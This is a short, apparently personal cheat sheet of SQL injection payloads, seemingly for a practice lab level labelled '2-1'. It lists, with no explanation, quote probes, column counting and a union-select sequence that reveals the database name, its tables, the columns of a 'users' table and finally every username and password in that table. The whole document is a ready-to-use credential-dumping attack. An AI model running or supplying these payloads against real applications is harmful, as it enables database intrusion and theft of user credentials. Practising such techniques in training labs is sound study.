2-1
" ’ ‘’ LIMIT 0,1
order by 3
union select 1,2,3 --+
union select 1,2,database() --+
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sql'--+
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sql' and table_name='users'--+
union select 1,2,group_concat(concat_ws(',',username,password) SEPARATOR '|') from users --+